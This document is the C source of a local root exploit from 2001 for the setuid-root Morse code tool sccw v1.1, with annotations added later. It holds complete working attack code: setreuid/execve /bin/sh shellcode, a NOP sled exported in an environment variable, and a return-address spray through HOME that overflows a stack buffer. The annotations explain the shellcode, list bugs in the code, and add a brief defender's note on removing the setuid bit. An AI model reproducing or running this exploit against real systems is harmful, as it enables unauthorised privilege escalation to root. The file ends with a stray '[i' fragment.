A local buffer-overflow exploit for sccw v1.1 (and possibly other versions). It yields root (uid=0).
d1d7ed798702a71cff032aca0dd11741f3f394e38171c2bbc7a8a1538a4d3b4d
/*
* (sccw v1.1*) root[uid=0] local buffer overflow exploit.
*
* Author: Cody Tubbs (loophole of hhp).
* Site: http://www.hhp-programming.net/
* Email: pigspigs@yahoo.com
* Date: 6/4/2001. 2:51:34AM CST.
*
* Info: sccw is a Morse code practice utility, much like pileup.
* It is installed setuid root (+s) by default.
*
* Tested on Slackware 7.1 2.4.5 x86.
*/
#include <stdio.h>
#define PATH "/bin/sccw" // Change if needed.
#define OFFSET -6226 // Worked for me, brute if fails.
#define ALIGN 1 // Should not need to be change.
#define NOP 0x90 // x86 No OPeration.
#define DBUF 300 // 256+4(ebp)+4(eip)=264.
/* Payload that main() exports in the SCCWEX environment variable.
 * 30 bytes of i386 Linux machine code: setreuid(0,0) through int 0x80
 * (syscall number 70 in al), then execve of "//bin/sh" (syscall 11).
 * Observation: none of the bytes is 0x00, which is what lets it be
 * carried intact through putenv() as a C string. */
static char shellcode[]= // 30 bytes setreuid(0,0) execve /bin/sh shellcode.
"\x31\xdb" // xor ebx, ebx      ; ebx = 0 (ruid)        // By bighawk[@warfare.com]
"\x31\xc9" // xor ecx, ecx      ; ecx = 0 (euid)
"\x99" // cdq                   ; edx = sign-extension of eax (presumed 0 — depends on eax on entry)
"\xb0\x46" // mov al, 70        ; syscall 70 = setreuid
"\xcd\x80" // int 80h           ; setreuid(0,0)
"\x53" // push ebx              ; NUL terminator for the path string below
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh   ; "n/sh"
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh   ; "//bi"  -> stack now holds "//bin/sh\0"
"\x89\xe3" // mov ebx, esp      ; ebx = pointer to "//bin/sh" (execve filename)
"\x52" // push edx              ; argv terminator (relies on edx == 0 from cdq above)
"\x53" // push ebx              ; argv[0] = filename
"\x89\xe1" // mov ecx, esp      ; ecx = argv
"\xb0\x0b" // mov al, 11        ; syscall 11 = execve
"\xcd\x80"; // int 80h          ; execve(ebx, ecx, edx)
/* Returns the caller's current stack pointer, used by main() as the base
 * for the return-address guess. Note the body has no return statement: it
 * relies on the inline asm leaving %esp in %eax, which happens to be the
 * integer return register in the 32-bit x86 calling convention. That is a
 * compiler- and optimisation-level-specific effect, not C: reaching the end
 * of a non-void function without a return is undefined behaviour. */
long get_sp(void){__asm__("movl %esp,%eax");}
/* Prints the program banner and the usage line to stderr.
 * heh is echoed as the program name (main passes argv[0]). */
void workit(char *heh){
    fputs("(sccw v1.1*) Local root[uid=0] exploit.\n", stderr);
    fputs("Author: Cody Tubbs (loophole of hhp).\n", stderr);
    fprintf(stderr, "Usage: %s [offset] [align(0..3)]\n", heh);
}
/* Entry point. Builds two environment variables and then execs the target:
 *   HOME   = DBUF bytes of the guessed return address (eipeip), preceded by
 *            `align` filler bytes so the 4-byte address copies land on the
 *            intended boundary in the target's frame;
 *   SCCWEX = a sled of NOP (0x90) bytes followed by the shellcode (buffer).
 * The DBUF comment above (256+4(ebp)+4(eip)) indicates the target copies
 * HOME into a 256-byte stack buffer; the saved return address ends up
 * overwritten with `address`, which points into the sled.
 *
 * Review notes (correctness, not changed here):
 *  - `main` has no return type (implicit int, removed in C99), and atoi,
 *    strlen, memcpy, putenv and execlp are called without <stdlib.h>,
 *    <string.h> or <unistd.h> (implicit declarations, also removed in C99).
 *  - Neither eipeip nor buffer is NUL-terminated before strlen()/putenv();
 *    correct operation depends on a zero byte occurring in the address
 *    pattern or in buffer's uninitialised tail, which is undefined behaviour.
 *  - The address-fill loop stores 4 bytes at every i from `align` up to
 *    DBUF-1, so for align > 0 the final store writes past the end of eipeip
 *    (e.g. align=1 touches index 300 of a 300-byte array); the stores are
 *    also unaligned type-punned writes through a long*.
 *  - execlp's terminating argument should be a null pointer, (char *)0,
 *    not the int literal 0, for ABIs where int and pointer widths differ.
 *  - heh[] is declared but never used; argv[0] is read before argc is checked.
 *
 * Defender's note: the exposure rests on sccw being installed setuid root
 * (see file header) and on an apparently unbounded copy of HOME into a
 * fixed-size stack buffer; dropping the setuid bit or bounding that copy
 * removes the privilege path. */
main(int argc, char **argv){
char eipeip[DBUF], buffer[4096], heh[DBUF+1];
int i, offset, align;
long address;
workit(argv[0]);
// Optional argv overrides for the stack offset and the alignment shift.
if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
if(argc>2){align=atoi(argv[2]);}else{align=ALIGN;}
// Guessed return address: this process's stack pointer minus the offset.
address=get_sp()-offset;
// `align` filler bytes (0x69) so the address copies below start on the right boundary. //0x69.DOOT:D
if(align>0){for(i=0;i<align;i++){eipeip[i]=0x69;}}
// Spray the address over the rest of eipeip in 4-byte steps (see review note on the final store).
for(i=align;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}
// Fill buffer with NOPs, leaving room at the end for the shellcode; i is reused below as the insertion point.
for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){buffer[i]=NOP;}
// The first 5 bytes of the spray are overwritten by the variable name; export as HOME.
memcpy(eipeip,"HOME=",5);putenv(eipeip);
// Append the shellcode after the sled, then export the sled+payload as SCCWEX.
memcpy(buffer+i,shellcode,strlen(shellcode));
memcpy(buffer,"SCCWEX=",7);putenv(buffer);
fprintf(stderr, "Ret-addr %#x, offset: %d, align: %d.\n",address,offset,align);
// Replace this process with the target; the modified environment is inherited.
execlp(PATH,"sccw",0);
}
[i